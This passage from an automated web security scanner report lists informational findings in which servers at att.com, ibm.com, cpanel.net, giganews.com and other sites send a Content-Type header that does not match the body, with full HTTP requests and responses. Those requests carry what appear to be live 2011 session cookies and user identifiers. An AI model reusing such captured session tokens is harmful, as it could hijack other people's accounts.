Content-Length: 1502
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:14 GMT
Accept-Ranges: bytes
ETag: "261ffed9e6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:35 GMT
Connection: close

GIF87a:...w..,....:...................................<v.<w.=w.=x.>y.>z.?|.?}.@.@..C..C..G..G..D..D.!G.!G.%K.%K.*R.*R.)V.)V.,Y.,Y..X..X./]./].2^.2^.1b.1b.3f.3f.5k.5k.9p.9p.;u.;u.?{.?{.C..C..F..F..H..
...[SNIP]...

28.79. http://www.advancedvoip.com/images/voip_billing_provider_p.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advancedvoip.com
Path:   /images/voip_billing_provider_p.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_provider_p.jpg HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1705
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:10 GMT
Accept-Ranges: bytes
ETag: "a2ed83d7e6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:36 GMT
Connection: close

GIF87a:...w..,....:....................................*..*..*..+..,    .,
.-
..
.-../..0..2..3..4..5..4..5.!5."7."8.#9.%;.%<.'@.&C.)B.+C.+D.,G..H..L.2N.2O.:Z.:[.8n.8o.9n.:o.:k.;m.<o.8p.9p.9q.9r.:p.;q.:r
...[SNIP]...

28.80. http://www.aradial.com/images/bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aradial.com
Path:   /images/bg.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain HTML.

Request

GET /images/bg.gif HTTP/1.1
Host: www.aradial.com
Proxy-Connection: keep-alive
Referer: http://www.aradial.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:34 GMT
Server: Apache
Last-Modified: Mon, 13 Dec 2004 21:02:56 GMT
ETag: "fca86d2-120-41be0380"
Accept-Ranges: bytes
Content-Length: 288
Content-Type: image/gif

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /aradial/images/bg.gif was not found on this server.<P>

...[SNIP]...

28.81. http://www.att.com/media/en_US/images/ico/ico_security_AA0009X7.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.att.com
Path:   /media/en_US/images/ico/ico_security_AA0009X7.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /media/en_US/images/ico/ico_security_AA0009X7.jpg HTTP/1.1
Host: www.att.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; browserid=A001722225240; svariants=NA; DL3K=0; ECOM_GTM=owbth_NA_NA_NA_ostdbth; __utma=52846072.845099683.1315325061.1315325061.1315325061.1; __utmz=52846072.1315325061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); d4421046-efa2-4b8f-86b0-7cdce9b8067a=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%22YRv1CNCXi5e%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.att.com%2F%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923713484570324388; TLTHID=CD44864EE0C910E0095E9C3AFD3198B7; TLTSID=CD44864EE0C910E0095E9C3AFD3198B7; TLTUID=CD44864EE0C910E0095E9C3AFD3198B7; B2CSESSIONID=Q2lRTzzXGBJTxL!-1935813224; DYN_USER_ID=4200816524; DYN_USER_CONFIRM=9364325c1a8e3d6fcb7f813ca16d55db; BIGipServerpATTWL_7010_7011=1037160839.25115.0000; meteor_referrer_cache=http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u; 49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=%7B%22parent_id%22%3A%224pj9azku6R1%22%2C%22referrer%22%3A%22http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u%22%2C%22id%22%3A%221gfCnkBxeSl%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%23fbid%3D4pj9azku6R1%3Fsource%3DECbc0000000WIP00O%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; fsr.a=1316239904414; fsr.s=%7B%22cp%22%3A%7B%22u-verse_avail%22%3A%22unknown%22%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 Aug 2010 18:09:28 GMT
ETag: "6c-48d9026868600"
Accept-Ranges: bytes
Content-Length: 108
Content-Type: image/jpeg
Cache-Control: max-age=900
Date: Sat, 17 Sep 2011 01:10:20 GMT
Connection: close

GIF89a.......:..eee..................!.......,..........1XZ..A...#"R..^Q.|J@.$..U../..4........3.O.#..0X!..;

28.82. http://www.att.com/navservice/navservlet  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.att.com
Path:   /navservice/navservlet

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /navservice/navservlet?locale=en_US HTTP/1.1
Host: www.att.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; browserid=A001722225240; svariants=NA; DL3K=0; ECOM_GTM=owbth_NA_NA_NA_ostdbth; __utma=52846072.845099683.1315325061.1315325061.1315325061.1; __utmz=52846072.1315325061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); d4421046-efa2-4b8f-86b0-7cdce9b8067a=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%22YRv1CNCXi5e%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.att.com%2F%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923713484570324388; TLTHID=CD44864EE0C910E0095E9C3AFD3198B7; TLTSID=CD44864EE0C910E0095E9C3AFD3198B7; TLTUID=CD44864EE0C910E0095E9C3AFD3198B7; B2CSESSIONID=Q2lRTzzXGBJTxL!-1935813224; DYN_USER_ID=4200816524; DYN_USER_CONFIRM=9364325c1a8e3d6fcb7f813ca16d55db; BIGipServerpATTWL_7010_7011=1037160839.25115.0000; meteor_referrer_cache=http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u; 49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=%7B%22parent_id%22%3A%224pj9azku6R1%22%2C%22referrer%22%3A%22http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u%22%2C%22id%22%3A%221gfCnkBxeSl%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%23fbid%3D4pj9azku6R1%3Fsource%3DECbc0000000WIP00O%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; fsr.s=%7B%22cp%22%3A%7B%22u-verse_avail%22%3A%22unknown%22%7D%7D; fsr.a=1316239908007

Response

HTTP/1.1 200 OK
Server: Apache
Access-Control-Allow-Origin: *
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 85230
Date: Sat, 17 Sep 2011 01:52:44 GMT
Connection: close

[{"id":"p2001","url":"http://www.att.com/shop/index.jsp","displayName":
"SHOP","code":"010000","isHead":false,"image":"","windowLocation":"N",
"specialTreatment":"","advanced":"","actionType":
...[SNIP]...

28.83. http://www.att.com/u-verse/dwr/interface/DWRRequestManager.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.att.com
Path:   /u-verse/dwr/interface/DWRRequestManager.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /u-verse/dwr/interface/DWRRequestManager.js?2011-09-16-11-30-26 HTTP/1.1
Host: www.att.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; browserid=A001722225240; svariants=NA; DL3K=0; ECOM_GTM=owbth_NA_NA_NA_ostdbth; __utma=52846072.845099683.1315325061.1315325061.1315325061.1; __utmz=52846072.1315325061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); d4421046-efa2-4b8f-86b0-7cdce9b8067a=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%22YRv1CNCXi5e%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.att.com%2F%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923713484570324388; TLTHID=CD44864EE0C910E0095E9C3AFD3198B7; TLTSID=CD44864EE0C910E0095E9C3AFD3198B7; TLTUID=CD44864EE0C910E0095E9C3AFD3198B7; B2CSESSIONID=Q2lRTzzXGBJTxL!-1935813224; DYN_USER_ID=4200816524; DYN_USER_CONFIRM=9364325c1a8e3d6fcb7f813ca16d55db; BIGipServerpATTWL_7010_7011=1037160839.25115.0000

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 2704
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=900
Date: Sat, 17 Sep 2011 01:52:03 GMT
Connection: close


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (DWRRequestManager == null) var
...[SNIP]...

28.84. http://www.bostonherald.com/news/includes/twitter.inc  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /news/includes/twitter.inc

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /news/includes/twitter.inc HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhfont=12; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk; __utma=1.249425585.1316021953.1316021953.1316021953.1; __utmz=1.1316021953.1.1.utmcsr=scores.heraldinteractive.com|utmccn=(referral)|utmcmd=referral|utmcct=/merge/tsnform.aspx
If-Modified-Since: Wed, 14 Sep 2011 12:20:09 GMT

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:09:31 GMT
Server: Apache
Last-Modified: Fri, 16 Sep 2011 23:20:07 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18568
Connection: close


            <!-- twitter_dynamic_content -->
               <p><a class="twitter_name sec_news" href="http://twitter.com/joedwinell/" target="_new">Joe Dwinell</a>: Waltham murder victims all stabbed in neck: <a href
...[SNIP]...

28.85. http://www.cpanel.net/images/logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cpanel.net
Path:   /images/logo.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/logo.jpg HTTP/1.1
Host: www.cpanel.net
Proxy-Connection: keep-alive
Referer: http://www.cpanel.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bb_sessionhash=7b42b50b859ac7069bd0783e6f7218a5; bb_lastvisit=1316202173; bb_lastactivity=0; bb_calendar=2dcb47838013fab34d7be4fb7b6665f066c82f07a-3-%7Bs-7-.calyear._i-2011_s-8-.calmonth._i-9_s-8-.calview1._s-12-.displaymonth._%7D; __utma=21786852.1717603496.1316220231.1316220231.1316220231.1; __utmb=21786852.5.9.1316220698102; __utmc=21786852; __utmz=21786852.1316220231.1.1.utmcsr=duckduckgo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=21786852.usergroup-1-Unregistered%20%2F%20Not%20Logged%20In

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:50:44 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e
Last-Modified: Fri, 16 Apr 2010 05:47:36 GMT
Accept-Ranges: bytes
Content-Length: 2132
Cache-Control: max-age=86400
Expires: Sat, 17 Sep 2011 19:50:44 GMT
Content-Type: image/jpeg

GIF89a..............................z..z.....z...........z.....z..=..z.....z...........=.....z........z..\.....[..\.....=..=........z..[..=..[........j.................=..\..=.......................k.
...[SNIP]...

28.86. https://www.easynews.com/signup/lookit.phtml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.easynews.com
Path:   /signup/lookit.phtml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /signup/lookit.phtml HTTP/1.1
Host: www.easynews.com
Connection: keep-alive
Referer: https://www.easynews.com/signup/?accounttype=20&linktype=trialbuttontophome
Content-Length: 39
Origin: https://www.easynews.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer9=4eae35f1b34eae35f1b30a654ca39c; __utmx=40324861.; __utmxx=40324861.; __utma=63532859.1552519903.1316219542.1316219542.1316219542.1; __utmb=63532859.1.10.1316219542; __utmc=63532859; __utmz=63532859.1316219542.1.1.utmgclid=CJzUx83AoqsCFRdlgwod-2urfQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server; PAPVisitorId=abd16110a066614fc7d576400r5Cr6Wx

cu=&sp=1b2ee5e1225581be36ba95ef9c06dbf4

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:35:41 GMT
Server: Apache
Content-Length: 3
Keep-Alive: timeout=45, max=300
Connection: Keep-Alive
Content-Type: text/html

3|0

28.87. http://www.giganews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.giganews.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.giganews.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; engine_keywords=google%3Bnntp%20server; __utma=176644346.1185559513.1316219532.1316219532.1316219532.1; __utmb=176644346.1.10.1316219532; __utmc=176644346; __utmz=176644346.1316219532.1.1.utmgclid=CMbM1MnAoqsCFQNggwod4mqsoA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:29 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Mon, 30 May 2005 18:07:36 GMT
ETag: "26996a-57e-3f856c3346a00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Vary: Accept-Encoding
Content-Length: 1406

..............h.......(....... ...............................@`... ......@@...............`..............@ ..........@`... ...@......@...@@..p...H... ........x...p...d...\...T...L...H...4h...........
...[SNIP]...

28.88. https://www.giganews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.giganews.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.giganews.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; engine_keywords=google%3Bnntp%20server; __utma=176644346.1185559513.1316219532.1316219532.1316219532.1; __utmb=176644346.1.10.1316219532; __utmc=176644346; __utmz=176644346.1316219532.1.1.utmgclid=CMbM1MnAoqsCFQNggwod4mqsoA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:29 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Mon, 30 May 2005 18:07:36 GMT
ETag: "26996a-57e-3f856c3346a00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Vary: Accept-Encoding
Content-Length: 1406
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

..............h.......(....... ...............................@`... ......@@...............`..............@ ..........@`... ...@......@...@@..p...H... ........x...p...d...\...T...L...H...4h...........
...[SNIP]...

28.89. http://www.ibm.com/developerworks/dwtagg/css/h3/dogear.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ibm.com
Path:   /developerworks/dwtagg/css/h3/dogear.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /developerworks/dwtagg/css/h3/dogear.css HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/forums/thread.jspa?messageID=14644760
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www-142.ibm.com/software/products/us/en/search%3Fpgel%3Dlnav%26hppcode%3D1%26st%3Dnew%26q1%3Dxss; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:01 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Last-Modified: Fri, 06 Mar 2009 20:17:56 GMT
ETag: "3f2b7-1e9a-faf42500"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 7834
Content-Type: text/css

<%@ page contentType="text/css"%>
/* Copyright IBM Corp. 2006, 2008 All Rights Reserved. */

<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>
<%@ taglib prefix=
...[SNIP]...

28.90. http://www.ibm.com/developerworks/dwtags/dwjquerytabtags  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ibm.com
Path:   /developerworks/dwtags/dwjquerytabtags

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /developerworks/dwtags/dwjquerytabtags?lang=en&base=http://www.ibm.com/developerworks/tivoli/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/plain, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.ibm.com/developerworks/tivoli/library/s-csscript/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:08 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix)
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
X-LConn-Auth: false
Last-Modified: Fri, 16 Sep 2011 19:50:03 GMT
Cache-Control: public,max-age=18000,s-maxage=18000
Vary: User-Agent,Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 36119


                       <!-- Cloud Style -->
   <div id="dogearTagCloud">
       <div id="content-slider"></div>
       
           
                                                                                                                                                                                       <div id="ui-slider-scale"><p
...[SNIP]...

28.91. http://www.ibm.com/developerworks/java/inc/author-module.inc  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ibm.com
Path:   /developerworks/java/inc/author-module.inc

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /developerworks/java/inc/author-module.inc HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/plain, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.ibm.com/developerworks/java/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000O2z-Ev76yNpPHLnd4LgjbzQ:13uppre7c; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:14 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Last-Modified: Wed, 07 Sep 2011 18:26:40 GMT
ETag: "cbc3c-6bb-15d49800"
Accept-Ranges: bytes
ntCoent-Length: 1723
Content-Type: text/plain
Vary: User-Agent, Accept-Encoding
Content-Length: 1723

<div class="ibm-two-column ibm-alternate-four">
   <div class="ibm-column ibm-first">
       <div class="ibm-container">
           <h2>Author, speaker, developer, and longtime dW contributor Andy Glover</h2>            
...[SNIP]...

28.92. http://www.ibm.com/developerworks/tagging/UseCaseServlet  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ibm.com
Path:   /developerworks/tagging/UseCaseServlet

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /developerworks/tagging/UseCaseServlet?use_case=gettagcloudhtml&action=gettagcloud&url=http%3A%2F%2Fwww.ibm.com%2Fdeveloperworks%2Fforums%2Fthread.jspa%3FmessageID%3D14644760&lang=en HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0
Referer: http://www.ibm.com/developerworks/forums/thread.jspa?messageID=14644760
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:10 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 42468


                       <!-- Cloud Style -->
   <div id="dogearTagCloud" style="display:none;">
   
   
   <style>
   .tagStatDetailPopup{position:absolute;opacity:0.99999;border:1px solid #649DE0;widt
...[SNIP]...

28.93. http://www.ibm.com/developerworks/utils/ratingJSON.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ibm.com
Path:   /developerworks/utils/ratingJSON.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /developerworks/utils/ratingJSON.jsp?article=91238&rn=0.6837379799063366 HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.ibm.com/developerworks/tivoli/library/s-csscript/
